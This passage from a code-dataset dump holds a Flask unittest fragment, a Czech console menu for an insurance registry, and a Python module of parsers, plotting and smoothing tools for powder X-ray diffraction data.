self.app_context.push()\n db.create_all()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_elective_listv2(self):\n e = ElectiveListv2(electiveID = \"CSE312\",electiveName=\"Pattern Recognition\",electiveDescription=\"Pattern Recognition Details\")\n db.session.add(e)\n db.session.commit()\n p = ElectiveListv2.query.filter_by(id = e.id).first()\n self.assertEqual(p.electiveID, \"CSE312\")\n self.assertEqual(p.electiveName, \"Pattern Recognition\")\n\n def test_elective_listv2_check(self):\n s = StudentDetails(roll_no = \"CSE17001\", name = \"Shreya\", batch=\"2020\",section=\"A\", department = \"CSE\")\n db.session.add(s)\n db.session.commit()\n\n e = ElectiveListv2(electiveID = \"CSE312\",electiveName=\"Pattern 
Recognition\",electiveDescription=\"Pattern Recognition Details\")\n db.session.add(e)\n db.session.commit()\n\n querystring = \"Select * from student, elective_listv2 where student.elective_id1 = elective_listv2.electiveID or student.elective_id2 = elective_listv2.electiveID or student.elective_id3 = elective_listv2.electiveID\"\n res = db.engine.execute(querystring)\n\n for row in res:\n self.assertEqual(row[4], \"CSE312\")\n self.assertEqual(row[11], \"Pattern Recognition\")\n\n\nif __name__ == '__main__':\n # unittest.main(verbosity=2)\n unittest.main(testRunner=HtmlTestRunner.HTMLTestRunner(output = \"unit_reports\", combine_reports = True))","repo_name":"RamNewton/Eligere-Elective-Management-System","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6254288114","text":"import os\r\nfrom intro import intro\r\nfrom insured import Insured\r\n\r\ndef management():\r\n \r\n print(intro)\r\n \r\n print(\"--> Evidence pojištěných <--\\n\")\r\n print(\"Vyberte si akci:\")\r\n print(\"\\t1 - Přidat nového pojištěného\")\r\n print(\"\\t2 - Vypsat všechny pojištěné\")\r\n print(\"\\t3 - Vyhledat pojištěného\")\r\n print(\"\\t4 - Konec\")\r\n \r\n option = input(\"Zadání: \")\r\n \r\n # Vložení nového pojištěnce na základě jeho unikátního ID nebo jakéhokoli\r\n # unikátního registračního čísla\r\n if option == \"1\":\r\n os.system('cls')\r\n new_insured = Insured()\r\n Insured.data_insured[new_insured.reg_no] = new_insured\r\n \r\n # Výpis všech pojištěných\r\n elif option == \"2\":\r\n if Insured.data_insured:\r\n os.system('cls')\r\n print(\"Celkový počet pojištěných.\", Insured.get_all_insurance())\r\n print(\"\\nVýpis s detaily pojištěnců\")\r\n for i, insured in enumerate(Insured.data_insured.values()):\r\n print(\"Pojištěnec - \", i + 1)\r\n insured.get_insured()\r\n print()\r\n else:\r\n print(\"Žádná data nejsou v evidenci\")\r\n \r\n # Vyhledání pojištěného podle ID nebo registrační čísla\r\n elif option == \"3\":\r\n os.system('cls')\r\n reg_no = input(\"\\nZadejte ID pojištěného: \")\r\n try:\r\n Insured.data_insured[reg_no].get_insured()\r\n except:\r\n print(\"Zadané ID neevidujeme.\")\r\n \r\n # Ukončení programu\r\n elif option == \"4\":\r\n os.system('cls')\r\n exit()","repo_name":"SonicRJ/python_insurance_company","sub_path":"management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20114026052","text":"import sys\nimport os\nimport argparse\n\nfrom shutil import copyfile\n\nimport numpy as np\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.transforms as transforms\n\nfrom scipy.interpolate import interp1d\n\nimport math\n\n__version__ = '2.0.1'\n\nparams = {'legend.fontsize': 10,\n 'legend.labelspacing': 0.1}\nplt.rcParams.update(params)\n\nLINESDIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n\nplanck_constant = 6.62606957E-34\nelementary_charge = 1.60217656E-19\nspeed_of_light = 2.99792458E8\n\niza_codes = [\"ABW\", \"ACO\", \"AEI\", \"AEL\", \"AEN\", \"AET\", \"AFG\", \"AFI\", \"AFN\",\n \"AFO\", \"AFR\", \"AFS\", \"AFT\", \"AFV\", \"AFX\", \"AFY\", \"AHT\", \"ANA\",\n \"APC\", \"APD\", \"AST\", \"ASV\", \"ATN\", \"ATO\", \"ATS\", \"ATT\", \"ATV\",\n \"AVL\", \"AWO\", \"AWW\", \"BCT\", \"BEA\", \"BEC\", \"BIK\", \"BOF\", \"BOG\",\n \"BOZ\", \"BPH\", 
\"BRE\", \"BSV\", \"CAN\", \"CAS\", \"CDO\", \"CFI\", \"CGF\",\n \"CGS\", \"CHA\", \"CHI\", \"CLO\", \"CON\", \"CSV\", \"CZP\", \"DAC\", \"DDR\",\n \"DFO\", \"DFT\", \"DOH\", \"DON\", \"EAB\", \"EDI\", \"EEI\", \"EMT\", \"EON\",\n \"EPI\", \"ERI\", \"ESV\", \"ETR\", \"EUO\", \"EWT\", \"EZT\", \"FAR\", \"FAU\",\n \"FER\", \"FRA\", \"GIS\", \"GIU\", \"GME\", \"GON\", \"GOO\", \"HEU\", \"IFO\",\n \"IFR\", \"IFW\", \"IFY\", \"IHW\", \"IMF\", \"IRN\", \"IRR\", \"IRY\", \"ISV\",\n \"ITE\", \"ITG\", \"ITH\", \"ITN\", \"ITR\", \"ITT\", \"ITV\", \"ITW\", \"IWR\",\n \"IWS\", \"IWV\", \"IWW\", \"JBW\", \"JNT\", \"JOZ\", \"JRY\", \"JSN\", \"JSR\",\n \"JST\", \"JSW\", \"KFI\", \"LAU\", \"LEV\", \"LIO\", \"LIT\", \"LOS\", \"LOV\",\n \"LTA\", \"LTF\", \"LTJ\", \"LTL\", \"LTN\", \"MAR\", \"MAZ\", \"MEI\", \"MEL\",\n \"MEP\", \"MER\", \"MFI\", \"MFS\", \"MON\", \"MOR\", \"MOZ\", \"MRE\", \"MSE\",\n \"MSO\", \"MTF\", \"MTN\", \"MTT\", \"MTW\", \"MVY\", \"MWW\", \"NAB\", \"NAT\",\n \"NES\", \"NON\", \"NPO\", \"NPT\", \"NSI\", \"OBW\", \"OFF\", \"OKO\", \"OSI\",\n \"OSO\", \"OWE\", \"PAR\", \"PAU\", \"PCR\", \"PHI\", \"PON\", \"POS\", \"PSI\",\n \"PUN\", \"RHO\", \"RON\", \"RRO\", \"RSN\", \"RTE\", \"RTH\", \"RUT\", \"RWR\",\n \"RWY\", \"SAF\", \"SAO\", \"SAS\", \"SAT\", \"SAV\", \"SBE\", \"SBN\", \"SBS\",\n \"SBT\", \"SEW\", \"SFE\", \"SFF\", \"SFG\", \"SFH\", \"SFN\", \"SFO\", \"SFS\",\n \"SFV\", \"SFW\", \"SGT\", \"SIV\", \"SOD\", \"SOF\", \"SOS\", \"SSF\", \"SSO\",\n \"SSY\", \"STF\", \"STI\", \"STO\", \"STT\", \"STW\", \"SVR\", \"SVV\", \"SZR\",\n \"TER\", \"THO\", \"TOL\", \"TON\", \"TSC\", \"TUN\", \"UEI\", \"UFI\", \"UOS\",\n \"UOV\", \"UOZ\", \"USI\", \"UTL\", \"UWY\", \"VET\", \"VFI\", \"VNI\", \"VSV\",\n \"WEI\", \"WEN\", \"YUG\", \"ZON\"] # updated dec 2015\n\n\ndef lineno():\n \"\"\"Returns the current line number in our program.\"\"\"\n import inspect\n return inspect.currentframe().f_back.f_lineno\n\n\ndef printer(data):\n \"\"\"Print things to stdout on one line dynamically\"\"\"\n sys.stdout.write(\"\\r\\x1b[K\"+data.__str__())\n sys.stdout.flush()\n\n\ndef gen_read_files(paths):\n \"\"\"opens file, returns file object for reading\"\"\"\n for path in paths:\n try:\n f = open(path)\n except OSError as e:\n print(e)\n # print 'Cannot open {} (IOError)'.format(path,e)\n exit(0)\n yield f\n\n\ndef read_file(path):\n \"\"\"opens file, returns file object for reading\"\"\"\n try:\n f = open(path)\n except OSError as e:\n print(e)\n # print 'Cannot open {} (IOError)'.format(path,e)\n exit(0)\n return f\n\n\ndef read_data(fn, usecols=None, append_zeros=False, savenpy=False, suffix='', is_ticks=False, wl=1.0):\n if fn == 'stepco.inp':\n f = read_file(fn)\n return parse_xrs(f, return_as='d')\n\n root, ext = os.path.splitext(fn)\n\n if ext == '' and root.upper() in iza_codes:\n fn = parse_iza_code(code=root)\n return read_data(fn, wl=wl)\n\n if ext == '.cif':\n fn = run_cif2xy(fn, wl=wl) # requires CCTBX and FOCUS\n return read_data(fn)\n\n if ext.lower() == '.xrdml':\n return parse_xrdml(fn)\n\n try:\n inp = np.load(root+'.npy')\n except (OSError, AssertionError):\n inp = np.loadtxt(fn, usecols=usecols, ndmin=2)\n else:\n ext = '.npy'\n fn = root+'.npy'\n\n if append_zeros:\n (i, j) = inp.shape\n inp = np.hstack((inp, np.zeros((i, 1))))\n\n if inp.shape[1] > 3:\n print(f'More than 3 columns read from {f.name}, assuming x,y,esd, ignoring the rest.')\n\n d = Data(inp, name=fn+suffix, is_ticks=is_ticks)\n\n if savenpy and ext != '.npy':\n np.save(root, inp)\n\n return d\n\n\ndef load_tick_marks(path, 
col=3):\n \"\"\"Checks if file exists and loads tick mark data as data class. Use column=3 default for xrs\"\"\"\n try:\n f = open(path)\n f.close()\n except OSError:\n print(f'-- {path} not found. (IOError)')\n return None\n\n ticks = read_data(path, usecols=(col,), append_zeros=True, is_ticks=True)\n return ticks\n\n\ndef get_correlation_matrix(f, topas=False):\n names = []\n lst_not_iprm = []\n\n def yield_corrmat(f):\n for i, line in enumerate(f):\n # calculate shift to correct for topas formatting\n shift = max(0, int(math.log10(i+1))-1)\n if line.startswith('}'):\n return # end the generator; raising StopIteration here is a RuntimeError under PEP 479\n else:\n if not line.startswith('iprm'):\n lst_not_iprm.append(i)\n names.append(line[0:21].strip())\n yield line[26+shift:]\n\n for line in f:\n if line.startswith('C_matrix_normalized'):\n next(f)\n next(f)\n\n print('Ignoring reflection intensities (iprm***), because they are always correlated.')\n corr = np.genfromtxt(yield_corrmat(f), delimiter=4)\n corr = corr[lst_not_iprm, :][:, lst_not_iprm]\n\n return corr, names\n\n f.seek(0)\n return np.loadtxt(f), names\n\n\ndef parse_xrdml(fn):\n \"\"\"Very basic function to read panalytical XPERT PRO files (XML)\n Only parses file to get intensities and data range\"\"\"\n\n from xml.dom import minidom\n xmldoc = minidom.parse(fn)\n\n counts = xmldoc.getElementsByTagName('intensities')[0] # grab element\n # get first node + convert to float\n counts = list(map(float, counts.firstChild.wholeText.split()))\n\n for rangenode in xmldoc.getElementsByTagName('positions'):\n if rangenode.getAttribute('axis') == '2Theta':\n break\n else:\n rangenode = None\n if not rangenode:\n raise OSError(\"Cannot find range node in xrdml file.\")\n\n r_min = float(rangenode.getElementsByTagName(\n 'startPosition')[0].firstChild.wholeText)\n r_max = float(rangenode.getElementsByTagName(\n 'endPosition')[0].firstChild.wholeText)\n steps = len(counts)\n\n th2 = np.linspace(r_min, r_max, steps)\n\n xy = np.vstack([th2, counts]).T\n\n d = Data(xy, name=fn)\n\n root, ext = os.path.splitext(fn)\n new = root+'.xy'\n if not os.path.isfile(new):\n d.print_pattern(name=new)\n\n return d\n\n\ndef parse_iza_code(code):\n \"\"\"Takes IZA code and returns path to cif\"\"\"\n\n fn = code.upper()+'0.cif'\n path = os.path.join(LINESDIR, 'zeolite_database', fn)\n\n print(f'Framework code {code} -> {path}')\n print()\n\n return path\n\n\ndef run_cif2xy(cif, wl=1.0):\n raise DeprecationWarning(\n (\"This feature has been deprecated, sorry. 
\"\n \"The CIF library no longer works for Python 3.\"))\n \n import subprocess as sp\n\n sp.call([sys.executable, os.path.join(os.path.dirname(\n os.path.abspath(__file__)), \"cif2xy.py\"), f\"--wavelength={wl}\", cif])\n root, ext = os.path.splitext(cif)\n basename = os.path.basename(root)\n return basename+\".xy\"\n\n\ndef parse_xrs(f, return_as='d_xrs'):\n # xy = np.array([], dtype=float).reshape(0, 2)\n start = True\n pre = []\n post = []\n\n x = []\n y = []\n esd = []\n\n for line in f:\n if 'finish' in line.lower() or 'end' in line.lower():\n # Takes care of new xrs files with no bgvalu commands\n start = False\n post.append(line)\n elif line.lower().startswith('bgvalu') and start:\n inp = line.split()\n x.append(float(inp[1]))\n y.append(float(inp[2]))\n try:\n esd.append(float(inp[3]))\n except IndexError:\n esd.append(np.nan)\n elif start:\n pre.append(line)\n elif not start:\n post.append(line)\n\n f.close()\n\n if return_as == 'xye':\n return np.vstack([x, y, esd]).T\n elif return_as == 'xy':\n return np.vstack([x, y]).T\n elif return_as == 'd':\n xye = np.vstack([x, y, esd]).T\n d = Data(xye, name='stepco.inp')\n return d\n elif return_as == 'd_xrs': # include xrs stepco input data\n xye = np.vstack([x, y, esd]).T\n d = Data(xye, name='stepco.inp')\n xrs = [f.name, pre, post]\n return d, xrs\n else:\n raise SyntaxError\n\n\ndef parse_crplot_dat(f):\n \"\"\"Parses crplot.dat file\"\"\"\n\n # skip first 2 lines\n next(f)\n next(f)\n\n ret = []\n\n for line in f:\n inp = line.split()\n if not f:\n continue\n ret.append([float(val) for val in inp])\n\n return ret\n\n\ndef parse_hkl_dat(f):\n ret = []\n\n for line in f:\n inp = line.split()\n if not f:\n continue\n if len(inp) < 4:\n inp = (line[0:3], line[3:6], line[6:9], line[9:])\n else:\n ret.append([float(val) for val in inp])\n\n return ret\n\n\ndef plot_stdin(fig, update_time=0.2):\n import time\n TclError = matplotlib.backends.backend_tkagg.tkagg.Tk._tkinter.TclError\n\n print('Reading stdin.\\n')\n\n def nrange(n=0):\n while True:\n yield n\n n = n+1\n\n iterator = (n for n in nrange())\n\n # fig = plt.figure()\n ax = fig.add_subplot(111)\n\n x = []\n y = []\n\n l1, = ax.plot(x, y, label='stdin')\n\n plt.legend()\n fig.show()\n\n t0 = time.time()\n\n while True:\n try:\n line = sys.stdin.readline()\n except KeyboardInterrupt as e:\n print(e)\n break\n\n if line == '':\n try:\n # update figure to prevent slow responsiveness\n fig.canvas.flush_events()\n except TclError:\n print('-- Window closed (TclError on readline).')\n break\n\n try:\n time.sleep(0.05) # prevent high cpu usage\n except KeyboardInterrupt as e:\n print(e)\n break\n else:\n continue\n\n inp = line.split()\n\n try:\n y.append(float(inp[1]))\n x.append(float(inp[0]))\n except IndexError:\n x.append(next(iterator))\n y.append(float(inp[0]))\n\n if time.time() - t0 > update_time:\n # drawing is slow, better to refresh ever x seconds\n\n t0 = time.time()\n\n l1.set_xdata(x)\n l1.set_ydata(y)\n\n ax.relim()\n ax.autoscale()\n\n plt.draw()\n\n try:\n # update figure to prevent slow responsiveness\n fig.canvas.flush_events()\n except TclError:\n print('-- Window closed (TclError on update).')\n break\n\n\ndef f_monitor(fin, f_init, f_update, fig=None, poll_time=0.05):\n \"\"\"experimental function for live monitoring of plots\"\"\"\n import time\n\n TclError = matplotlib.backends.backend_tkagg.tkagg.Tk._tkinter.TclError\n\n if not fig:\n fig = plt.figure()\n\n ax = fig.add_subplot(111)\n\n while True:\n try:\n args = f_init(fin, fig, ax)\n except OSError:\n 
time.sleep(1)\n else:\n break\n\n plt.legend()\n fig.show()\n\n current_lastmod = os.stat(fin).st_mtime\n\n while True:\n try:\n mtime = os.stat(fin).st_mtime\n except OSError:\n time.sleep(1)\n continue\n\n if mtime == current_lastmod:\n # flushing here as well, to prevent locking up of mpl window\n\n try:\n fig.canvas.flush_events()\n except TclError:\n print('-- Window closed (TclError).')\n break\n\n # low poll time is needed to keep responsiveness\n\n try:\n time.sleep(poll_time)\n except KeyboardInterrupt as e:\n print(e)\n break\n\n else:\n print(f'Updated: {fin} -', time.ctime(os.stat(fin).st_mtime))\n current_lastmod = os.stat(fin).st_mtime\n time.sleep(0.2)\n args = f_update(fin, *args)\n\n # ax.relim()\n # ax.autoscale() # resets the boundaries -> annoying for a plot\n # that doesn't need rescaling\n plt.draw()\n\n # And this allows you to at least close the window (and crash the\n # program by that ;))\n fig.canvas.flush_events()\n\n\ndef plot_init(fn, fig, ax):\n # f = read_file(fn)\n d = read_data(fn)\n\n if fn in ('fcalc_fou.xy', 'fobs_fou.xy', 'fcfo.out'):\n try:\n root, ext = os.path.splitext(fn)\n xl, yl = root.split('_')\n except ValueError:\n xl = 'Fobs'\n yl = 'Fcalc'\n\n ax.set_xlabel(xl)\n ax.set_ylabel(yl)\n ax.set_title(fn)\n line, = ax.plot(\n d.x, d.y, 'o', label=f'{xl} vs {yl}', color='r', linestyle='')\n diag, = ax.plot(\n [0, 25], [0, 25], color='b', linestyle='-', linewidth=2)\n return [line, diag]\n else:\n line, = ax.plot(d.x, d.y, label=fn)\n return [line]\n\n\ndef plot_update(fn, *args):\n # f = read_file(fn)\n d = read_data(fn)\n\n if fn in ('fcalc_fou.xy', 'fobs_fou.xy', 'fcfo.out'):\n [line, diag] = args\n line.set_data(d.x, d.y)\n diag.set_data([0, 25], [0, 25])\n return [line, diag]\n else:\n [line] = args\n line.set_data(d.x, d.y)\n return [line]\n\n\ndef crplot_init(fin, fig, ax):\n\n fcr = open('crplot.dat')\n fhkl = open('hkl.dat')\n\n crdata = np.array(parse_crplot_dat(fcr))\n hkldata = np.array(parse_hkl_dat(fhkl))\n\n fcr.close()\n fhkl.close()\n\n tt = crdata[:, 0]\n obs = crdata[:, 1]\n clc = crdata[:, 2]\n dif = crdata[:, 3]\n\n tck = hkldata[:, 3]\n\n mx_dif = max(dif)\n\n pobs, = ax.plot(tt, obs, label='observed', c='green')\n pclc, = ax.plot(tt, clc, label='calculated', c='red')\n pdif, = ax.plot(tt, dif - mx_dif, label='difference', c='blue')\n\n pobs_zero, = ax.plot(tt, np.zeros(tt.size), c='black')\n pdif_zero, = ax.plot(tt, np.zeros(tt.size) - mx_dif, c='black')\n\n ptcks, = ax.plot(tck, np.zeros(tck.size) - (mx_dif / 4),\n linestyle='', marker='|', markersize=10, label='ticks', c='purple')\n\n args = [pobs, pclc, pdif, pobs_zero, pdif_zero, ptcks]\n\n return args\n\n\ndef crplot_update(fin, *args):\n pobs, pclc, pdif, pobs_zero, pdif_zero, ptcks = args\n\n fcr = open('crplot.dat')\n fhkl = open('hkl.dat')\n\n crdata = np.array(parse_crplot_dat(fcr))\n hkldata = np.array(parse_hkl_dat(fhkl))\n\n fcr.close()\n fhkl.close()\n\n tt = crdata[:, 0]\n obs = crdata[:, 1]\n clc = crdata[:, 2]\n dif = crdata[:, 3]\n\n tck = hkldata[:, 3]\n\n mx_dif = max(dif)\n\n pobs.set_data(tt, obs)\n pclc.set_data(tt, clc)\n pdif.set_data(tt, dif - mx_dif)\n pobs_zero.set_data(tt, np.zeros(tt.size))\n pdif_zero.set_data(tt, np.zeros(tt.size) - mx_dif)\n ptcks.set_data(tck, np.zeros(tck.size) - (mx_dif / 4))\n\n args = [pobs, pclc, pdif, pobs_zero, pdif_zero, ptcks]\n\n return args\n\n\ndef f_crplo():\n # difference data\n crplotdat = 'crplot.dat'\n fcr = open(crplotdat)\n\n crdata = np.array(parse_crplot_dat(fcr))\n\n tt = crdata[:, 0]\n obs = crdata[:, 
1]\n clc = crdata[:, 2]\n dif = crdata[:, 3]\n\n mx_dif = max(dif)\n\n plt.plot(tt, obs, label='observed')\n plt.plot(tt, clc, label='calculated')\n plt.plot(tt, dif - mx_dif, label='difference')\n\n plt.plot(tt, np.zeros(tt.size), c='black')\n plt.plot(tt, np.zeros(tt.size) - mx_dif, c='black')\n\n # tick marks\n hkldat = 'hkl.dat'\n try:\n fhkl = open(hkldat)\n except OSError:\n print('-- hkl.dat not found. (IOError)')\n else:\n hkldata = np.array(parse_hkl_dat(fhkl))\n tck = hkldata[:, 3]\n plt.plot(tck, np.zeros(tck.size) - (mx_dif / 4), linestyle='',\n marker='|', markersize=10, label='ticks', c='purple')\n\n\ndef f_prf(fin):\n fin = open(fin)\n\n for i in range(6):\n next(fin)\n\n tt, fobs, fcal, diff = np.genfromtxt(\n fin, usecols=(0, 1, 2, 3), unpack=True)\n\n mx_diff = max(diff)\n\n plt.plot(tt, fobs, label='observed')\n plt.plot(tt, fcal, label='calculated')\n plt.plot(tt, diff-mx_diff, label='difference')\n\n plt.plot(tt, np.zeros(tt.size), c='black')\n plt.plot(tt, np.zeros(tt.size) + (diff[0] - mx_diff), c='black')\n\n\ndef f_prf_init(fin, fig, ax):\n fin = open(fin)\n\n for i in range(6):\n next(fin)\n\n tt, fobs, fcal, diff = np.genfromtxt(\n fin, usecols=(0, 1, 2, 3), unpack=True)\n\n mx_diff = max(diff)\n\n pfobs, = ax.plot(tt, fobs, label='observed')\n pfcal, = ax.plot(tt, fcal, label='calculated')\n pdiff, = ax.plot(tt, diff-mx_diff, label='difference')\n\n pzero_fobs, = ax.plot(tt, np.zeros(tt.size), c='black')\n pzero_diff, = ax.plot(\n tt, np.zeros(tt.size) + (diff[0] - mx_diff), c='black')\n\n args = [pfobs, pfcal, pdiff, pzero_fobs, pzero_diff]\n return args\n\n\ndef f_prf_update(fin, *args):\n pfobs, pfcal, pdiff, pzero_fobs, pzero_diff = args\n\n fin = open(fin)\n\n for i in range(6):\n next(fin)\n\n tt, fobs, fcal, diff = np.genfromtxt(\n fin, usecols=(0, 1, 2, 3), unpack=True)\n\n mx_diff = max(diff)\n\n pfobs.set_data(tt, fobs)\n pfcal.set_data(tt, fcal)\n pdiff.set_data(tt, diff-mx_diff)\n pzero_fobs.set_data(tt, np.zeros(tt.size))\n pzero_diff.set_data(tt, np.zeros(tt.size) + (diff[0] - mx_diff))\n\n args = [pfobs, pfcal, pdiff, pzero_fobs, pzero_diff]\n return args\n\n\ndef f_plot_stepco_special(bg_xy):\n \"\"\"Specialised function for plotting XRS output, that takes an XRS data file (crplo.dat)\n and adds the background to the difference in order to make fine adjustments to the background\"\"\"\n\n crplotdat = 'crplot.dat'\n try:\n fcr = open(crplotdat)\n except OSError:\n print(f'\\n{crplotdat} not found. Skipping difference plot.')\n else:\n crdata = np.array(parse_crplot_dat(fcr))\n tt = crdata[:, 0]\n dif = crdata[:, 3]\n\n bg_interpolate = interpolate(bg_xy, tt, kind='linear')\n\n plt.plot(tt, bg_interpolate + dif, label='bg + diff')\n\n\ndef f_plot_topas_special(xyobs, xycalc, xydiff, xybg, lw=1.0):\n \"\"\"Special function that takes observed, calculated and difference plot and adds it to the background.\n This is useful to compare the difference and adjust the background accordingly\"\"\"\n\n if not xybg:\n raise OSError(\n \" ** Background data not found. 
Please specify with --bgin\")\n\n tt = xyobs.x\n\n bg_interpolate = interpolate(xybg.xy, tt, kind='linear')\n\n plt.plot(tt, xycalc.y + bg_interpolate, label='ycalc', lw=lw)\n # plt.plot(tt, xyobs.y + bg_interpolate, label='yobs')\n\n plt.plot(tt, bg_interpolate + xydiff.y, label='bg + diff', lw=lw)\n plt.plot(tt, bg_interpolate, label='bg', lw=lw)\n\n\ndef f_plot_weighted_difference(xyobs, xycalc, xyerr, lw=1.0):\n \"\"\"Special function to calculate and display the weighted difference plot\n For more information see: Young, 'The Rietveld Method', 1993, p24-25\"\"\"\n\n assert xyobs.xy.shape == xycalc.xy.shape == xyerr.xy.shape, \"Arrays xyobs, xycalc, and xyerr are of different shape!\"\n\n offset = -20\n\n wdiff = (((xyobs.y-xycalc.y) / (xyobs.y + min(xyobs.y)+1)) / xyerr.y)\n wdiff2 = ((xyobs.y-xycalc.y) / xyerr.y)\n plt.plot(xyobs.x, wdiff+offset, label=\"weighted difference\", lw=lw)\n plt.plot((min(xyobs.x), max(xyobs.x)), (offset, offset), c='black')\n\n plt.plot(xyobs.x, wdiff2+offset*2, label=\"weighted difference 2\", lw=lw)\n\n # plt.plot(xyobs.x, xyobs.y-xycalc.y+offset*2, label=\"difference\")\n\n plt.plot(xyobs.x, xyerr.y+offset*3, label=\"error\")\n\n\ndef f_bg_correct_out(d, bg_xy, kind='linear', offset='ask', suffix_bg='_bg', suffix_corr='_corr'):\n \"\"\"Function that removes the background from a data set and prints it to a new file\"\"\"\n\n root, ext = os.path.splitext(d.filename)\n fn_bg = root+suffix_bg+ext\n fn_corr = root+suffix_corr+ext\n\n # fn_bg = d.filename.replace('.','_bg.')\n # fn_corr = d.filename.replace('.','_corr.')\n\n out_bg = open(fn_bg, 'w')\n out_corr = open(fn_corr, 'w')\n\n xvals = d.x\n yvals = d.y\n\n bg_yvals = interpolate(bg_xy, xvals, kind=kind)\n\n if offset == 'ask':\n offset = input(\n \"What y offset should I add to the data? 
(x=exit)\n >> [0] \") or 0\n\n if offset == 'x':\n return\n\n offset = int(offset) # cast only after the exit check; int('x') would raise ValueError\n\n print(f'\\nOffset = {offset}')\n\n if len(bg_xy) >= 4:\n print('Writing background pattern to %s' % fn_bg)\n for x, y in zip(xvals, bg_yvals):\n if np.isnan(y):\n continue\n print('{:15.6f}{:15.6f}'.format(x, y), file=out_bg)\n print('Writing corrected pattern to %s' % fn_corr)\n\n if d.has_esd:\n err = d.err\n\n for x, y, e in zip(xvals, yvals-bg_yvals+offset, err):\n if np.isnan(y):\n continue\n print('{:15.6f}{:15.6f}{:15.6f}'.format(x, y, e), file=out_corr)\n else:\n for x, y in zip(xvals, yvals-bg_yvals+offset):\n if np.isnan(y):\n continue\n print('{:15.6f}{:15.6f}'.format(x, y), file=out_corr)\n else:\n raise IndexError(\n 'Not enough values in background array, need at least 4 points.')\n\n\ndef new_stepco_inp(xy, name, pre, post, esds=None):\n \"\"\"Function for writing stepco input files\"\"\"\n\n print(f'Writing xy data to file {name}')\n\n f = open(name, 'w')\n\n for line in pre:\n print(line, end=' ', file=f)\n\n if np.any(esds):\n esds = esds.reshape(1, -1)\n\n for (x, y, esd) in np.vstack((xy, esds)).T:\n if np.isnan(esd):\n esd = ''\n else:\n esd = f'{esd:15.6f}'\n print(f'BGVALU {x:15f}{y:15.6f}{esd}', file=f)\n else:\n for x, y in xy.T:\n print(f'BGVALU {x:15f}{y:15.6f}', file=f)\n\n for line in post:\n print(line, end=' ', file=f)\n\n f.close()\n\n\ndef interpolate(arr, xvals, kind='cubic'):\n \"\"\"\n arr is the data set to interpolate, can be ndim=2 array, or tuple/list of x/y values\n\n xvals are the values it has to be interpolated to\n\n kind is the type of interpolation. Valid options: 'linear', 'nearest', 'zero',\n 'slinear', 'quadratic', 'cubic', or an integer specifying the order\n of the spline interpolator to use.\n \"\"\"\n\n try:\n arr.ndim\n except AttributeError:\n x, y = arr\n else:\n assert arr.ndim == 2, 'Expected 2 dimensional array'\n x = arr[:, 0] # create views\n y = arr[:, 1] #\n\n try:\n kind = int(kind)\n except ValueError:\n if x.shape[0] < 4:\n kind = 'linear'\n else:\n if x.shape[0] < kind+1:\n kind = 'linear'\n\n res = interp1d(x, y, kind=kind, bounds_error=False)\n\n # if the background seems to take shortcuts in linear mode, this is because fixed steps\n # were set in the Backgrounder class\n\n return res(xvals)\n\n\ndef smooth(x, window_len=11, window='hanning'):\n \"\"\"smooth the data using a window with requested size.\n\n This method is based on the convolution of a scaled window with the signal.\n The signal is prepared by introducing reflected copies of the signal \n (with the window size) in both ends so that transient parts are minimized\n in the beginning and end part of the output signal.\n\n input:\n x: the input signal\n window_len: the dimension of the smoothing window; should be an odd integer\n window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\n flat window will produce a moving average smoothing.\n\n output:\n the smoothed signal\n\n example:\n\n t=linspace(-2,2,0.1)\n x=sin(t)+randn(len(t))*0.1\n y=smooth(x)\n\n see also:\n\n numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve\n scipy.signal.lfilter\n\n TODO: the window parameter could be the window itself if an array instead of a string\n\n FROM: http://www.scipy.org/Cookbook/SignalSmooth\n \"\"\"\n\n if x.ndim != 1:\n raise ValueError(\"smooth only accepts 1 dimension arrays.\")\n\n if x.size < window_len:\n raise ValueError(\"Input vector needs to be bigger than window size.\")\n\n if window_len < 3:\n return x\n\n if window not 
in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:\n raise ValueError(\n \"Window is one of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\")\n\n s = np.r_[2*x[0]-x[window_len-1::-1], x, 2*x[-1]-x[-1:-window_len:-1]]\n\n if window == 'flat': # moving average\n w = np.ones(window_len, 'd')\n else:\n w = getattr(np, window)(window_len) # look up the window function by name; avoids eval\n\n y = np.convolve(w/w.sum(), s, mode='same')\n\n return y[window_len:-window_len+1]\n\n\ndef savitzky_golay(y, window_size=11, order=2, deriv=0):\n r\"\"\"Smooth (and optionally differentiate) data with a Savitzky-Golay filter.\n The Savitzky-Golay filter removes high frequency noise from data.\n It has the advantage of preserving the original shape and\n features of the signal better than other types of filtering\n approaches, such as moving averages techniques.\n Parameters\n ----------\n y : array_like, shape (N,)\n the values of the time history of the signal.\n window_size : int\n the length of the window. Must be an odd integer number.\n order : int\n the order of the polynomial used in the filtering.\n Must be less than `window_size` - 1.\n deriv: int\n the order of the derivative to compute (default = 0 means only smoothing)\n Returns\n -------\n ys : ndarray, shape (N)\n the smoothed signal (or its n-th derivative).\n Notes\n -----\n The Savitzky-Golay is a type of low-pass filter, particularly\n suited for smoothing noisy data. The main idea behind this\n approach is to make for each point a least-square fit with a\n polynomial of high order over an odd-sized window centered at\n the point.\n Examples\n --------\n t = np.linspace(-4, 4, 500)\n y = np.exp( -t**2 ) + np.random.normal(0, 0.05, t.shape)\n ysg = savitzky_golay(y, window_size=31, order=4)\n import matplotlib.pyplot as plt\n plt.plot(t, y, label='Noisy signal')\n plt.plot(t, np.exp(-t**2), 'k', lw=1.5, label='Original signal')\n plt.plot(t, ysg, 'r', label='Filtered signal')\n plt.legend()\n plt.show()\n References\n ----------\n .. [1] A. Savitzky, M. J. E. Golay, Smoothing and Differentiation of\n Data by Simplified Least Squares Procedures. Analytical\n Chemistry, 1964, 36 (8), pp 1627-1639.\n .. [2] Numerical Recipes 3rd Edition: The Art of Scientific Computing\n W.H. Press, S.A. Teukolsky, W.T. Vetterling, B.P. 
